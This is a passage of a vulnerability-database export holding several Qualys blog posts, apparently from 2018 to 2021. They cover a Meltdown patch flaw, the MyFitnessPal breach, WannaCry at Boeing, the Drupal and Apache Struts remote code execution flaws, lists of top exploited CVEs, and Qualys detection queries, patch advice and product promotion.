Stay protected online from crypto-mining attacks with [Qualys BrowserCheck CoinBlocker](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>) Chrome extension.", "cvss3": {}, "published": "2018-07-25T17:00:02", "type": "qualysblog", "title": "Staying Safe in the Era of Browser-based Cryptocurrency Mining", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-07-25T17:00:02", "id": "QUALYSBLOG:DEB92D82F8384860B06735A45F20B980", "href": "https://blog.qualys.com/technology/2018/07/25/staying-safe-in-the-era-of-browser-based-cryptocurrency-mining", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-23T20:50:12", "description": "In our weekly roundup of InfoSec happenings, we start, as has often been the case this year, with concerning Meltdown / Spectre news -- this time involving Microsoft -- and also touch on a password hack at Under Armour, a WannaCry infection at Boeing, and a severe Drupal vulnerability.\n\n### Microsoft patches its Meltdown patch, then patches it again\n\nIn an instance of the cure possibly being worse than the disease, a Microsoft patch for Meltdown released in January created a gaping security hole in certain systems in which it was installed.\n\n\n\nIt took Microsoft two tries to fix the issue, which affects Windows 7 (x64) and Windows Server 2008 R2 (x64) systems. 
The company thought it had solved the vulnerability ([CVE-2018-1038](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038>)) with a scheduled patch last Tuesday, but then had to rush out an emergency fix two days later.\n\nSecurity researcher Ulf Frisk, who discovered the vulnerability, [called it](<http://blog.frizk.net/2018/03/total-meltdown.html?m=1>) \u201cway worse\u201d than Meltdown because it \u201callowed any process to read the complete memory contents at gigabytes per second\u201d and made it possible to write to arbitrary memory as well.\n\n\u201cNo fancy exploits were needed. Windows 7 already did the hard work of mapping in the required memory into every running process,\u201d Frisk wrote. \u201cExploitation was just a matter of read and write to already mapped in-process virtual memory. No fancy APIs or syscalls required -- just standard read and write.\u201d\n\nAs Qualys\u2019 Director of Product Management for Patch Management Gill Langston [wrote](<https://blog.qualys.com/laws-of-vulnerabilities/2018/03/30/a-patch-for-the-meltdown-patch-released-out-of-band-thursday-night>) in this blog, there are no current active attacks against this vulnerability but there is proof-of-concept code. \u201cOpportunistic actors could weaponize this exploit by using a multi-stage attack to gain access to an affected asset,\u201d he warned.\n\nLangston recommends that organizations install Thursday\u2019s out-of-band patch if they installed any of the security updates in January of this year or later. \u201cAlso ensure that other layers of protection (anti-malware, email security, web filtering) are up to date to minimize your risk profile,\u201d he wrote.\n\nQualys created QID 91440 in [Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>). 
Detection requires authenticated scanning or a[ Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) installed on the asset.\n\n### Under Armour\u2019s MyFitnessPal app passwords swiped\n\nCyber thieves stole usernames, email addresses, and hashed passwords from 150 million accounts of Under Armour\u2019s MyFitnessPal app at some point during February. Those affected must change their MyFitnessPal app passwords immediately, and should do the same on any other online account in which they\u2019ve used that same password.\n\nThey also should be vigilant about suspicious activity on all their other online accounts, and about unsolicited requests to provide personal information, visit webpages, click on email links or download attachments.\n\n\n\nUnder Armour, a sports apparel maker, made no mention in its [breach notice](<https://content.myfitnesspal.com/security-information/notice.html>) of how the hackers were able to access the data. The company discovered the hack last week.\n\nOver at Sophos\u2019[ Naked Security blog](<https://nakedsecurity.sophos.com/2018/03/30/150-million-myfitnesspal-accounts-compromised-heres-what-to-do/>), Mark Stockley points out that the hackers had at least a month \u201cto send targeted MyFitnessPal phishing emails, to crack the stolen password hashes, and to try any cracked passwords on other services (such as social media accounts).\u201d\n\n\u201cSince the information at risk can be used to log in to your MyFitnessPal account, all the data you see when you log in to your account is also at risk,\u201d he added.\n\n[Writing in Wired](<https://www.wired.com/story/under-armour-myfitnesspal-hack-password-hashing/>), Lily Hay Newman makes a thorough analysis of the hack, and of what Under Armour did well (quick disclosure, system segmentation, use of \u201cbcrypt\u201d hashing function) and not so well (use of SHA-1 hashing function).\n\n### WannaCry infects Boeing systems\n\nIf you thought WannaCry was oh so 2017, think again. 
The notorious ransomware grabbed headlines again last week when [news broke](<https://www.seattletimes.com/business/boeing-aerospace/boeing-hit-by-wannacry-virus-fears-it-could-cripple-some-jet-production/>) that it had cropped up at giant airplane manufacturer Boeing.\n\nWhen it was first detected, Boeing leaders feared the worst, including manufacturing process disruptions, but when the dust cleared it seems the damage was[ quickly contained and pretty limited](<https://twitter.com/BoeingAirplanes/status/979134166959783937>).\n\n\u201cWe\u2019ve done a final assessment,\u201d Linda Mills, the head of communications for Boeing Commercial Airplanes, told The Seattle Times. \u201cThe vulnerability was limited to a few machines. We deployed software patches. There was no interruption to the 777 jet program or any of our programs.\u201d\n\nStill, the incident serves as a good reminder that WannaCry -- formal name WanaCrypt0r 2.0 -- spreads using an exploit called EternalBlue for Windows OS vulnerabilities that Microsoft patched in March 2017, so more than a year ago now.\n\nThe vulnerabilities, in Windows\u2019 SMB (Server Message Block) protocol and described in [security bulletin MS17-010](<https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010>), were rated \u201cCritical\u201d at the time by Microsoft due to the potential for attackers to execute remote code in affected systems.\n\nWriting in Sophos\u2019 Naked Security blog, John E. 
Dunn suggests that systems remain unpatched for WannaCry because remediating these vulnerabilities isn\u2019t always straightforward.\n\n\u201cOne reason for this persistence is that WannaCry doesn\u2019t just affect regular desktops, laptops and servers, but also spreads to and from unpatched Windows 7 systems of the sort widely used in manufacturing as Windows Embedded,\u201d Dunn [wrote](<https://nakedsecurity.sophos.com/2018/03/29/boeing-hit-by-wannacry-reminding-everyone-the-threat-is-still-there/>).\n\nHere\u2019s [more information](<https://community.qualys.com/docs/DOC-6110?_ga=2.192879138.925004837.1522623823-480546418.1484260199>) on how to detect and address the MS17-010 vulnerabilities with Qualys products.\n\nOther WannaCry resources from Qualys include:\n\n * Detailed walkthrough of [how to report on it](<https://community.qualys.com/docs/DOC-6111?_ga=2.197079204.925004837.1522623823-480546418.1484260199>) for those new to Qualys.\n * Detailed walkthrough of [how to build WannaCry dashboards](<https://community.qualys.com/docs/DOC-6122-how-to-create-assetview-widgets-to-report-on-wannacry?_ga=2.197079204.925004837.1522623823-480546418.1484260199>) in AssetView. 
Also available as a [webcast](<https://lps.qualys.com/visualize-your-threat-exposure-to-wannacry-and-shadow-brokers-with-dashboards.html?_ga=2.197079204.925004837.1522623823-480546418.1484260199>).\n * [De-duping WannaCry detections](<https://community.qualys.com/thread/17321-de-duping-wannacry?_ga=2.197079204.925004837.1522623823-480546418.1484260199>)\n * [On-demand WannaCry webcast](<https://lps.qualys.com/rapidly-identify-assets-risk-wannacry-ransomware.html?utm_source=blog&utm_medium=website&utm_campaign=demand-gen&utm_term=wannacry-q2-2017&utm_content=webcast&leadsource=344554153&_ga=2.197079204.925004837.1522623823-480546418.1484260199>), [summary](<https://blog.qualys.com/news/2017/05/19/no-more-tears-wannacry-highlights-importance-of-prompt-precise-vulnerability-remediation>) and [transcript of participant Q&A](<https://blog.qualys.com/technology/2017/05/23/digging-into-wannacry-details-answers-to-your-burning-questions>) showing how to identify at-risk assets and institute threat-prioritized remediation processes for current and future risks.\n * [First-hand perspective](<http://www.techrepublic.com/article/patching-wannacrypt-dispatches-from-the-frontline/>) of how one company kept the threat under control (via TechRepublic)\n * Technical Resources and Detection Methods for WannaCry related QIDs are found in the WannaCry Support Article: [Qualys response for Global Ransomware Attack (WannaCry)](<https://qualys.secure.force.com/articles/How_To/000001942>)\n\n### \n\n \n\n\n\n### Drupal: Highly critical vulnerability affects 1M+ websites\n\nAs it had recently [promised](<https://www.drupal.org/psa-2018-001>), Drupal last week released a patch for a remote code execution vulnerability it rated as \u201chighly critical\u201d that affects multiple subsystems of Drupal 7.x and 8.x.\n\n\u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d Drupal 
[warned](<https://www.drupal.org/sa-core-2018-002>) in its advisory.\n\n\n\nIn a companion [FAQ](<https://groups.drupal.org/security/faq-2018-002>), the Drupal security team pegged the scope of affected systems at 9% of sites using its CMS (content management system) platform, or more than 1 million sites. \n\nWhile Drupal has no knowledge of successful exploits of this vulnerability, it nonetheless recommends immediate remediation because \u201csite owners should anticipate that exploits may be developed and should therefore update their sites immediately.\u201d\n\nThe solution: Upgrade to the most recent version of Drupal 7 or 8 core.\n\nSpecifically, those running 7.x should upgrade to [Drupal 7.58](<https://www.drupal.org/project/drupal/releases/7.58>), or alternatively apply [this patch](<https://cgit.drupalcode.org/drupal/rawdiff/?h=7.x&id=2266d2a83db50e2f97682d9a0fb8a18e2722cba5>) on systems that can\u2019t be immediately upgraded. Meanwhile, those running 8.5.x should upgrade to [Drupal 8.5.1](<https://www.drupal.org/project/drupal/releases/8.5.1>), or apply [this patch](<https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f>) on systems that can\u2019t be immediately upgraded. The FAQ states that Drupal 6 is also affected and points users of that version to its [long term support page](<https://www.drupal.org/project/d6lts>).\n\nWriting in the Qualys Community site, Dave Ferguson, Director of Product Management for Web Application Scanning at Qualys, [called](<https://community.qualys.com/docs/DOC-6373-was-and-newly-discovered-drupal-vulnerabilities>) the vulnerability ([CVE-2018-7600](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600>)) \u201cvery dangerous.\u201d \n\nAccording to Ferguson, customers using Qualys Web Application Scanning (WAS) to scan all their websites on a regular basis can quickly find out if they\u2019re running a vulnerable Drupal version without having to run additional scans. 
\n\n\u201cSimply open WAS and go to Detections. In the search field, enter \"150183\" (this is the WAS QID reported when Drupal CMS is detected). If WAS has identified any web apps running Drupal, you will see QID 150183 listed in the detections. Open each detection and look at the Results section to see the version of Drupal running on that site. If necessary, start the patching process,\u201d Ferguson wrote.\n\n### In other infosec news \u2026\n\n * The city government of Atlanta, which recently suffered a serious[ ransomware attack](<https://www.csoonline.com/article/3264654/security/atlanta-officials-still-working-around-the-clock-to-resolve-ransomware-attack.html>) that disrupted operations, was warned months ago that its IT systems were riddled with \u201csevere and critical vulnerabilities\u201d that put them in serious danger of cyber attacks, [according to CBS46](<http://www.cbs46.com/story/37821878/internal-audit-shows-city-knew-of-it-vulnerabilities>), the local CBS affiliate. \n * Hackers breached a Baltimore city government server, impacting the city\u2019s 911 system, as [reported](<http://www.baltimoresun.com/news/maryland/crime/bs-md-ci-911-hacked-20180327-story.html>) by The Baltimore Sun.\n * Cryptocurrency Monero may not be as private as previously thought, according to a [research report](<https://arxiv.org/pdf/1704.04299.pdf>) published last week. 
Sophos\u2019 Naked Security blog has a [take](<https://nakedsecurity.sophos.com/2018/03/28/unmasking-monero-stripping-the-currencys-privacy-protection/>) on the research, as does [Wired](<https://www.wired.com/story/monero-privacy/>), while Coindesk [dismisses](<https://www.coindesk.com/broken-privacy-the-allegations-against-monero-are-old-news/>) the findings as \u201cold news.\u201d", "cvss3": {}, "published": "2018-04-02T18:02:51", "type": "qualysblog", "title": "Microsoft Misfires with Meltdown Patch, while WannaCry Pops Up at Boeing", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-1038", "CVE-2018-7600"], "modified": "2018-04-02T18:02:51", "id": "QUALYSBLOG:D57DEDE8164E21BF8EE0C81B50AAA328", "href": "https://blog.qualys.com/news/2018/04/02/microsoft-misfires-with-meltdown-patch-while-wannacry-pops-up-at-boeing", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-14T20:46:20", "description": "A new remote code execution [vulnerability](<https://cwiki.apache.org/confluence/display/WW/S2-057>) in Apache Struts 2, CVE-2018-11776, was [disclosed](<https://semmle.com/news/apache-struts-CVE-2018-11776>) yesterday. While this vulnerability does not exist with a default configuration of Struts, it does exist in commonly seen configurations for some Struts plugins.\n\n**Update August 24, 2018**: A [dashboard for this vulnerability](<https://community.qualys.com/docs/DOC-6515-dashboards-and-reporting-detecting-apache-struts-2-namespace-rce-cve-2018-11776>) is now available to download.\n\n### The Vulnerability\n\nStruts improperly validates namespaces, allowing for [OGNL](<https://en.wikipedia.org/wiki/OGNL>) injection, and can lead to full remote code execution on the target system. 
For a more detailed technical look at the vulnerability, please see our [Threat Protection blog](<https://threatprotect.qualys.com/2018/08/22/apache-struts-2-namespace-remote-code-execution-vulnerability-cve-2018-11776/>) on this topic. Struts versions up to and including 2.3.34 and 2.5.16 are impacted.\n\n### Recommended Response\n\nDue to the ease of exploitation and relatively common configuration that is required, this vulnerability should be patched immediately for all applications that use Struts 2. Patched versions are Struts [2.3.35](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.35>) and [2.5.17](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.17>). A publicly available [PoC](<https://github.com/jas502n/St2-057/blob/master/README.md>) has already been published, and active attacks against this vulnerability are most likely imminent.\n\n### Detections\n\nVulnerabilities in application frameworks are challenging to programmatically detect with traditional VM scanning, and multiple methods of detection are needed to ensure that Struts is found.\n\nBecause of this, Qualys has implemented two QIDs for detecting CVE-2018-11776 in [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>):\n\n * **QID 13251** - This detection includes both remote and authenticated checks: \n * **Remote** - This detection sends a specifically crafted payload in the request to check for command execution in .action, .go, .do, .jsp and .xhtml files under common web directories.\n * **Authenticated (Linux/Unix)** - This executes the ps -ef command, looks for the presence of the Tomcat process and finds the location of the struts2-core-x.jar file. We are investigating using this method on other middleware technologies.\n * **QID 371151** - This authenticated scan detection uses our Tomcat auth record to specify the location of the Tomcat configuration file. 
Once a Tomcat auth record is added, this detection reads the Tomcat location from the config and searches for the struts-core.x.jar file under its subdirectories. It extracts the version from the .jar file and compares it with the vulnerable Struts versions.\n * Both QIDs are included in Vulnerability Signatures version **VULNSIGS-2.4.403-3** or later\n\nQualys has also implemented a QID for detecting CVE-2018-11776 in [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-application-scanning/>):\n\n * **QID 150250** - This is an active detection within WAS that sends a specially-crafted payload to the scanned web application. A vulnerable application will show evidence of a command executing on the server and QID 150250 will be reported.\n\nIn addition to scanning, Qualys recommends that application frameworks such as Struts be documented in an Application Portfolio or CMDB to ensure all components of an application are recorded and can be audited for these kinds of vulnerabilities.\n\n### Protection\n\nEven prior to the disclosure of this RCE vulnerability, [Qualys Web Application Firewall](<https://www.qualys.com/apps/web-app-firewall/>) users were already protected from exploits by every possible out-of-the-box template and generic policy. 
These templates, developed by security experts for the Qualys WAF programmable inspection engine, are constantly tested against the latest threats for the best detection rate and least false-positives.\n\n\n\nCustomers using manual policies instead of templates were potentially not protected though, depending on ELI (Expression Language Injection), CI (Code Injection) and RCE (Remote Command Execution) slider settings, along with the blocking threshold.\n\n\n\n\n\nMitigating CVE-2018-11776 is possible by using the following methods:\n\n * native protection using a **generic policy** (QID-226017: Expression Language Injection and QID-226008: Remote Command Execution)\n * for those using a manual policy instead of an out-of-the-box template, you can alternatively create a **custom rule** with the following condition: _request.path DETECT \"qid/150178\"_\n * or of course, by applying a **virtual patch** to QID-150250 from within the WAS module, which is equivalent to creating the rule manually, but quicker.\n\nToday\u2019s example - like \"drupalgeddon2\" a few months ago (CVE-2018-7600) - demonstrates how blocking zero-days is possible with Qualys WAF, without needing to define manual rules, giving CISOs and IT Security organizations time to implement sustainable fixes, while providing them with a tool to monitor and report any attempt to exploit the vulnerability.", "cvss3": {}, "published": "2018-08-23T20:27:19", "type": "qualysblog", "title": "Detecting Apache Struts 2 Namespace RCE: CVE-2018-11776", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-11776", "CVE-2018-7600"], "modified": "2018-08-23T20:27:19", "id": "QUALYSBLOG:22DFA98A7ED25A67B3D38EAAE5C82A9E", "href": "https://blog.qualys.com/securitylabs/2018/08/23/detecting-apache-struts-2-namespace-rce-cve-2018-11776", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-12-27T19:32:53", "description": "[A recent 
report](<https://www.darkreading.com/threat-intelligence/20-vulnerabilities-to-prioritize-patching-before-2020/d/d-id/1336691>) identified 19+ vulnerabilities that should be mitigated by the end of 2019. These are a range of top vulnerabilities attacked and leveraged by Advanced Persistent Threat (APT) actors from all parts of the world.\n\nThe list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.\n\n**No.** | **CVE** | **Products Affected by CVE** | **CVSS Score (NVD)** | **Examples of Threat Actors** \n---|---|---|---|--- \n**1** | CVE-2017-11882 | Microsoft Office | 7.8 | APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia) \n**2** | CVE-2018-8174 | Microsoft Windows | 7.5 | Silent Group (Russia), Dark Hotel APT (North Korea) \n**3** | CVE-2017-0199 | Microsoft Office, Windows | 7.8 | APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Gorgon Group (Pakistan), Gaza Cybergang (Iran) \n**4** | CVE-2018-4878 | Adobe Flash Player, Red Hat Enterprise Linux | 9.8 | APT37 (North Korea), Lazarus Group (North Korea) \n**5** | CVE-2017-10271 | Oracle WebLogic Server | 7.5 | Rocke Gang (Chinese Cybercrime) \n**6** | CVE-2019-0708 | Microsoft Windows | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**7** | CVE-2017-5638 | Apache Struts | 10 | Lazarus Group (North Korea) \n**8** | CVE-2017-5715 | ARM, Intel | 5.6 | Unknown \n**9** | CVE-2017-8759 | Microsoft .net Framework | 7.8 | APT40 (China), Cobalt Group (Spain, Ukraine), APT10 (China) \n**10** | CVE-2018-20250 | RARLAB WinRAR | 7.8 | APT32 (Vietnam), APT33 (Iran), APT-C-27 (Iran), Lazarus Group (North Korea), MuddyWater 
APT (Iran) \n**11** | CVE-2018-7600 | Debian, Drupal | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru), Sea Turtle (Iran) \n**12** | CVE-2018-10561 | DASAN Networks | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**13** | CVE-2012-0158 | Microsoft | N/A; 9.3* | APT28 (Russia), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Lotus Blossom (China), Goblin Panda (China), Gorgon Group (Pakistan), APT40 (China) \n**14** | CVE-2017-8570 | Microsoft Office | 7.8 | APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT23 (China) \n**15** | CVE-2018-0802 | Microsoft Office | 7.8 | Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Cloud Atlas (Unknown), Cobalt Group (Spain, Ukraine), Goblin Panda (China), APT23 (China), APT27 (China), Rancor Group (China), Temp.Trident (China) \n**16** | CVE-2017-0143 | Microsoft SMB | 8.1 | APT3 (China), Calypso (China) \n**17** | CVE-2018-12130 | Fedora | 5.6 | Iron Tiger (China), APT3 (China), Calypso (China) \n**18** | CVE-2019-2725 | Oracle WebLogic Server | 9.8 | Panda (China) \n**19** | CVE-2019-3396 | Atlassian Confluence | 9.8 | APT41 (China), Rocke Gang (Chinese Cybercrime) \n \n* according to [cvedetails.com](<http://cvedetails.com/>)\n\n### Detecting the Top 19 CVEs\n\nQualys has detections (QIDs) for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that cover authenticated and remotely detected vulnerabilities supported by Qualys scanners and [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>).\n\nTo return a list of all impacted hosts, use the following QQL query within the VM Dashboard:\n \n \n vulnerabilities.vulnerability.cveIds:[CVE-2017-11882, CVE-2018-8174, CVE-2017-0199, CVE-2018-4878, CVE-2017-10271, CVE-2019-0708, CVE-2017-5638, CVE-2017-5715, CVE-2017-8759, CVE-2018-20250, CVE-2018-7600, CVE-2018-10561, CVE-2012-0158, CVE-2017-8570, CVE-2018-0802, CVE-2017-0143, CVE-2018-12130, CVE-2019-2725, CVE-2019-3396]\n\nYou can [import the following 
dashboard to track all 19 CVEs](<https://discussions.qualys.com/docs/DOC-7032>) as shown in the template below:\n\n[](<https://discussions.qualys.com/docs/DOC-7032>)\n\n### Alerts\n\nThe Qualys Cloud Platform enables you to continuously monitor for vulnerabilities and misconfigurations and get alerted for your most critical assets.\n\nSee how to set up [notifications for new and updated QIDs](<https://www.qualys.com/docs/version/8.21/qualys-vulnerability-notification.pdf>).\n\n### Tracking Per-Year Environment Impact and Remediation\n\nThe Qualys visualization team has included a Per-Year Environment Insight View Dashboard for easy tracking and remediation. This dashboard has been included in release 2.42 and can be found within the dashboard templates library. It will automatically show your systems whether scanned internally, externally or on remote mobile computers with the groundbreaking Qualys Cloud Agent.\n\n\n\nThis Per-Year Environment Insight View Dashboard will display data per year based on First Found date, followed by Vulnerability Status, Severity, Compliance, Real-Time Threat Intelligence (RTI)s from [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>), and Vulnerability Published Dates, allowing for an easy glance across your environment.\n\n\n\n \n\n### Get Started Now\n\nTo start detecting and remediating these vulnerabilities now, get a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/>).\n\nVisit the [Qualys Community](<https://community.qualys.com/docs/DOC-6785>) to download other dashboards created by your SMEs and Product Management team and import them into your subscription for further data insights.", "cvss3": {}, "published": "2019-12-27T18:01:22", "type": "qualysblog", "title": "Top 19+ Vulnerability CVEs in Santa\u2019s Dashboard Tracking", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-0143", "CVE-2017-0199", "CVE-2017-10271", "CVE-2017-11882", "CVE-2017-5638", 
"CVE-2017-5715", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-10561", "CVE-2018-12130", "CVE-2018-20250", "CVE-2018-4878", "CVE-2018-7600", "CVE-2018-8174", "CVE-2019-0708", "CVE-2019-2725", "CVE-2019-3396"], "modified": "2019-12-27T18:01:22", "id": "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "href": "https://blog.qualys.com/technology/2019/12/27/top-19-vulnerability-cves-in-santas-dashboard-tracking", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-02T20:34:35", "description": "On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [cybersecurity advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>) detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.\n\nThe advisory states, \u201cIf an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems).\u201d\n\nCISA released the advisory in conjunction with the Australian Cyber Security Centre (ACSC), the United Kingdom\u2019s National Cyber Security Centre (NCSC), and the U.S. 
Federal Bureau of Investigation (FBI).\n\nThe CISA advisory is similar in scope to the October 2020 United States National Security Agency (NSA) [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) listing the top 25 known vulnerabilities being actively used by Chinese state-sponsored cyber actors [that security teams can detect and mitigate or remediate](<https://blog.qualys.com/product-tech/2020/10/22/nsa-alert-chinese-state-sponsored-actors-exploit-known-vulnerabilities>) in their infrastructure using Qualys VMDR.\n\n### Top Routinely Exploited Vulnerabilities\n\nHere is the list of top routinely exploited vulnerabilities in 2020 and 2021 along with affected products and associated Qualys VMDR QID(s) for each vulnerability.\n\n**CVE-IDs**| **Affected Products**| **Qualys Detections (QIDs)** \n---|---|--- \nCVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065| Microsoft Exchange| 50107, 50108 \nCVE-2021-22893, CVE-2021-22894, CVE-2021-22899, CVE-2021-22900| Pulse Secure| 38838 \nCVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104| Accellion| 38830 \nCVE-2021-21985| VMware| 730102, 216261, 216260, 216259 \nCVE-2018-13379, CVE-2020-12812, CVE-2019-5591| Fortinet| 43702, 43769, 43825 \nCVE-2019-19781| Citrix| 150273, 372305, 372685 \nCVE-2019-11510| Pulse| 38771 \nCVE-2018-13379| Fortinet| 43702 \nCVE-2020-5902| F5- Big IP| 38791, 373106 \nCVE-2020-15505| MobileIron| 13998 \nCVE-2017-11882| Microsoft| 110308 \nCVE-2019-11580| Atlassian| 13525 \nCVE-2018-7600| Drupal| 371954, 150218, 277288, 176337, 11942 \nCVE-2019-18935| Telerik| 150299, 372327 \nCVE-2019-0604| Microsoft| 110330 \nCVE-2020-0787| Microsoft| 91609 \nCVE-2020-1472| Netlogon| 91688 \n \n### Detect CISA\u2019s Top Routinely Exploited Vulnerabilities using Qualys VMDR\n\nQualys released several remote and authenticated detections (QIDs) for the vulnerabilities. 
You can search for these QIDs in VMDR Dashboard using the following QQL query:\n\n__vulnerabilities.vulnerability.cveIds: [_`_CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27065`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-21985`,` CVE-2018-13379`,`CVE-2020-12812`,`CVE-2019-5591`,`CVE-2019-19781`,`CVE-2019-11510`,`CVE-2018-13379`,`CVE-2020-5902`,`CVE-2020-15505`,`CVE-2017-11882`,`CVE-2019-11580`,`CVE-2019-18935`,`CVE-2019-0604`,`CVE-2020-0787`,`CVE-2020-1472`]__\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for \u201cActive Attack\u201d RTI:\n\n\n\nWith VMDR Dashboard, you can track top 30 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [\u201cCISA: Alert (AA21-209A) | Top Exploited\u201d dashboard](<https://success.qualys.com/support/s/article/000006738>).\n\n\n\n### Recommendations\n\nAs guided by CISA, one must do the following to protect assets from being exploited:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Organizations\u2019 vigilance team should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n * Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.\n * Focus cyber defense resources on patching those vulnerabilities that cyber actors most often use.\n\n### Remediation and Mitigation\n\n * Patch systems and equipment promptly and diligently.\n * 
Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [_Qualys VMDR trial_](<https://www.qualys.com/subscriptions/vmdr/>) to automatically detect and mitigate or remediate the CISA top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T00:20:27", "type": "qualysblog", "title": "CISA Alert: Top Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-5591", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", 
